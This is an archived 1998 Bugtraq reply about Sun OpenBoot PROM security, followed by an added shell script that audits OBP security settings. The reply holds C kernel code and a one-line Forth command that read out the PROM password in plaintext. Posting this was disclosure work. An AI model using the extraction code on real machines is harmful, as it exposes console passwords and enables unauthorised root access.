Bugtraq mailing list archives
Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53)
From: leendert () WATSON IBM COM (Leendert van Doorn)
Date: Mon, 13 Jul 1998 16:30:07 -0400
# Jericho Nunn wrote:
#
# > Aside from the fact that it left me quite flabbergasted for quite
# >some time, mudge's OBP memory manipulation for acquiring root privileges
# >poses a serious risk for environments where SUN workstation consoles are
# >easily accessible to unprivileged individuals, such as university labs.
#
# This has been known for a long time. Indeed some 7 years ago whilst I
# was at university, and in my more "cat and mouse" gaming moods, I used
# this trick and a prom password was promptly added.

Given that we are on the subject of open boot prom passwords. Because of a
disagreement with the person that managed the pool of Sparc stations we ran
Amoeba on (he didn't want to give me the prom password but I was allowed to
boot my own kernels), my own kernels contained the following piece of code:

    #ifndef NDEBUG
    /*
     * Print the prom password so I know what it is when debugging a kernel
     */
    void
    print_password(void)
    {
        char cmd[OBP_CMDLEN], pwd[8];
        int i, pwdlen;

        preprom();
        if (obp->op_interpret) {
            /*
             * Forth stack effect: security-password leaves ( addr len );
             * the length is stored in pwdlen and len bytes are moved to pwd.
             */
            (void) sprintf(cmd, "security-password %x swap dup %x ! move",
                pwd, &pwdlen);
            obp->op_interpret(cmd);
            if (pwdlen > 0) {
                printf("OBP Password = '");
                for (i = 0; i < pwdlen; i++)
                    printf("%c", pwd[i]);
                printf("'\n");
            }
        }
        postprom();
    }
    #endif /* NDEBUG */

Yes, the prom password is unencrypted. "security-password dump" will show
the plaintext version.

        Leendert

--
Leendert van Doorn <leendert () watson ibm com>
IBM T.J. Watson Research Center (914) 784-7831
30 Saw Mill River Road, Hawthorne, NY 10532
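The mitigation mentioned in the quoted text is a PROM password. As an added example (not part of the original message or of the Amoeba code it quotes), this sketch audits the OpenBoot security variables in the `name=value` form printed by the Solaris `eeprom` command. The function name `audit_obp`, the finding strings and the `SAMPLE_*` inputs are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit OpenBoot PROM security variables as printed by Solaris
# `eeprom` (name=value lines). On a live SPARC host, as root: eeprom | audit_obp
# The SAMPLE_* inputs are constructed for illustration, not captured output.

audit_obp() {
    mode="" bad=""
    while IFS= read -r line; do
        name=${line%%=*}      # text before the first '='
        value=${line#*=}      # text after the first '='
        case "$name" in
            security-mode)         mode=$value ;;
            'security-#badlogins') bad=$value ;;
        esac
    done
    case "$mode" in
        full|command) echo "OK security-mode=$mode" ;;
        none) echo "FAIL security-mode=none: PROM prompt needs no password" ;;
        '')   echo "UNKNOWN security-mode not reported" ;;
        *)    echo "UNKNOWN security-mode=$mode" ;;
    esac
    case "$bad" in
        ''|*[!0-9]*) ;;   # absent or non-numeric: nothing to report
        *) if [ "$bad" -gt 0 ]; then
               echo "WARN security-#badlogins=$bad: failed PROM password attempts"
           fi ;;
    esac
    return 0
}

# Constructed sample: workstation with no PROM password protection.
SAMPLE_OPEN='auto-boot?=true
security-mode=none
security-#badlogins=0'

# Constructed sample: password-protected PROM with recorded failed attempts.
SAMPLE_LOCKED='auto-boot?=true
security-mode=command
security-#badlogins=3'

printf '%s\n' "$SAMPLE_OPEN"   | audit_obp
printf '%s\n' "$SAMPLE_LOCKED" | audit_obp
```

Because the message above shows the password is held unencrypted and is readable by any kernel booted on the machine, an OK result here only covers access at the console prompt; the PROM password should not be shared with any other account.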